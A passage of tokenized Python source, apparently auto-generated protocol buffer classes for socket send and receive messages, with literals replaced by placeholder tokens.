has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_data_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_stream_offset_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( self . has_send_to_ and not self . send_to_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthString ( len ( self . data_ ) ) <EOL> n += self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : n += <NUM_LIT:1> + self . lengthString ( self . send_to_ . ByteSize ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_data_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . data_ ) ) <EOL> if ( self . has_stream_offset_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : n += <NUM_LIT:1> + self . lengthString ( self . send_to_ . ByteSizePartial ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_data ( ) <EOL> self . clear_stream_offset ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_send_to ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . send_to_ . ByteSize ( ) ) <EOL> self . send_to_ . OutputUnchecked ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_data_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> if ( self . has_stream_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . send_to_ . ByteSizePartial ( ) ) <EOL> self . send_to_ . OutputPartial ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_data ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_stream_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_flags ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_send_to ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_data_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . data_ ) ) <EOL> if self . has_stream_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . stream_offset_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . flags_ ) ) <EOL> if self . has_send_to_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . send_to_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kdata = <NUM_LIT:2> <EOL> kstream_offset = <NUM_LIT:3> <EOL> kflags = <NUM_LIT:4> <EOL> ksend_to = <NUM_LIT:5> <EOL> ktimeout_seconds = <NUM_LIT:6> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:data>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> } , <NUM_LIT:6> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:6> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class SendReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_data_sent_ = <NUM_LIT:0> <EOL> data_sent_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def data_sent ( self ) : return self . data_sent_ <EOL> def set_data_sent ( self , x ) : <EOL> self . has_data_sent_ = <NUM_LIT:1> <EOL> self . data_sent_ = x <EOL> def clear_data_sent ( self ) : <EOL> if self . has_data_sent_ : <EOL> self . has_data_sent_ = <NUM_LIT:0> <EOL> self . data_sent_ = <NUM_LIT:0> <EOL> def has_data_sent ( self ) : return self . has_data_sent_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_data_sent ( ) ) : self . set_data_sent ( x . data_sent ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_data_sent_ != x . has_data_sent_ : return <NUM_LIT:0> <EOL> if self . has_data_sent_ and self . data_sent_ != x . data_sent_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_data_sent_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . data_sent_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_data_sent_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . data_sent_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_data_sent ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_data_sent_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . data_sent_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_data_sent_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . data_sent_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_data_sent ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_data_sent_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . data_sent_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kdata_sent = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ReceiveRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> MSG_OOB = <NUM_LIT:1> <EOL> MSG_PEEK = <NUM_LIT:2> <EOL> _Flags_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def Flags_Name ( cls , x ) : return cls . _Flags_NAMES . get ( x , "<STR_LIT>" ) <EOL> Flags_Name = classmethod ( Flags_Name ) <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_data_size_ = <NUM_LIT:0> <EOL> data_size_ = <NUM_LIT:0> <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def data_size ( self ) : return self . data_size_ <EOL> def set_data_size ( self , x ) : <EOL> self . has_data_size_ = <NUM_LIT:1> <EOL> self . data_size_ = x <EOL> def clear_data_size ( self ) : <EOL> if self . has_data_size_ : <EOL> self . has_data_size_ = <NUM_LIT:0> <EOL> self . data_size_ = <NUM_LIT:0> <EOL> def has_data_size ( self ) : return self . has_data_size_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_data_size ( ) ) : self . set_data_size ( x . data_size ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_data_size_ != x . has_data_size_ : return <NUM_LIT:0> <EOL> if self . has_data_size_ and self . data_size_ != x . data_size_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_data_size_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_data_size_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_data_size ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_data_size_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_data_size ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_data_size_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . data_size_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . flags_ ) ) <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kdata_size = <NUM_LIT:2> <EOL> kflags = <NUM_LIT:3> <EOL> ktimeout_seconds = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ReceiveReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_stream_offset_ = <NUM_LIT:0> <EOL> stream_offset_ = <NUM_LIT:0> <EOL> has_data_ = <NUM_LIT:0> <EOL> data_ = "<STR_LIT>" <EOL> has_received_from_ = <NUM_LIT:0> <EOL> received_from_ = None <EOL> has_buffer_size_ = <NUM_LIT:0> <EOL> buffer_size_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def stream_offset ( self ) : return self . stream_offset_ <EOL> def set_stream_offset ( self , x ) : <EOL> self . has_stream_offset_ = <NUM_LIT:1> <EOL> self . stream_offset_ = x <EOL> def clear_stream_offset ( self ) : <EOL> if self . has_stream_offset_ : <EOL> self . has_stream_offset_ = <NUM_LIT:0> <EOL> self . stream_offset_ = <NUM_LIT:0> <EOL> def has_stream_offset ( self ) : return self . has_stream_offset_ <EOL> def data ( self ) : return self . data_ <EOL> def set_data ( self , x ) : <EOL> self . has_data_ = <NUM_LIT:1> <EOL> self . data_ = x <EOL> def clear_data ( self ) : <EOL> if self . has_data_ : <EOL> self . has_data_ = <NUM_LIT:0> <EOL> self . data_ = "<STR_LIT>" <EOL> def has_data ( self ) : return self . has_data_ <EOL> def received_from ( self ) : <EOL> if self . received_from_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . received_from_ is None : self . received_from_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . received_from_ <EOL> def mutable_received_from ( self ) : self . has_received_from_ = <NUM_LIT:1> ; return self . received_from ( ) <EOL> def clear_received_from ( self ) : <EOL> if self . has_received_from_ : <EOL> self . has_received_from_ = <NUM_LIT:0> ; <EOL> if self . received_from_ is not None : self . received_from_ . Clear ( ) <EOL> def has_received_from ( self ) : return self . has_received_from_ <EOL> def buffer_size ( self ) : return self . buffer_size_ <EOL> def set_buffer_size ( self , x ) : <EOL> self . has_buffer_size_ = <NUM_LIT:1> <EOL> self . buffer_size_ = x <EOL> def clear_buffer_size ( self ) : <EOL> if self . has_buffer_size_ : <EOL> self . has_buffer_size_ = <NUM_LIT:0> <EOL> self . buffer_size_ = <NUM_LIT:0> <EOL> def has_buffer_size ( self ) : return self . has_buffer_size_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_stream_offset ( ) ) : self . set_stream_offset ( x . stream_offset ( ) ) <EOL> if ( x . has_data ( ) ) : self . set_data ( x . data ( ) ) <EOL> if ( x . has_received_from ( ) ) : self . mutable_received_from ( ) . MergeFrom ( x . received_from ( ) ) <EOL> if ( x . has_buffer_size ( ) ) : self . set_buffer_size ( x . buffer_size ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_stream_offset_ != x . has_stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_stream_offset_ and self . stream_offset_ != x . stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_data_ != x . has_data_ : return <NUM_LIT:0> <EOL> if self . has_data_ and self . data_ != x . data_ : return <NUM_LIT:0> <EOL> if self . has_received_from_ != x . has_received_from_ : return <NUM_LIT:0> <EOL> if self . has_received_from_ and self . received_from_ != x . received_from_ : return <NUM_LIT:0> <EOL> if self . has_buffer_size_ != x . has_buffer_size_ : return <NUM_LIT:0> <EOL> if self . has_buffer_size_ and self . buffer_size_ != x . buffer_size_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_received_from_ and not self . received_from_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stream_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . data_ ) ) <EOL> if ( self . has_received_from_ ) : n += <NUM_LIT:1> + self . lengthString ( self . received_from_ . ByteSize ( ) ) <EOL> if ( self . has_buffer_size_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . buffer_size_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stream_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . data_ ) ) <EOL> if ( self . has_received_from_ ) : n += <NUM_LIT:1> + self . lengthString ( self . received_from_ . ByteSizePartial ( ) ) <EOL> if ( self . has_buffer_size_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . buffer_size_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_stream_offset ( ) <EOL> self . clear_data ( ) <EOL> self . clear_received_from ( ) <EOL> self . clear_buffer_size ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_stream_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> if ( self . has_received_from_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . received_from_ . ByteSize ( ) ) <EOL> self . received_from_ . OutputUnchecked ( out ) <EOL> if ( self . has_buffer_size_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . buffer_size_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_stream_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> if ( self . has_received_from_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . received_from_ . ByteSizePartial ( ) ) <EOL> self . received_from_ . OutputPartial ( out ) <EOL> if ( self . has_buffer_size_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . buffer_size_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_stream_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_data ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_received_from ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_buffer_size ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_stream_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . stream_offset_ ) ) <EOL> if self . has_data_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . data_ ) ) <EOL> if self . has_received_from_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . received_from_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_buffer_size_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . buffer_size_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kstream_offset = <NUM_LIT:2> <EOL> kdata = 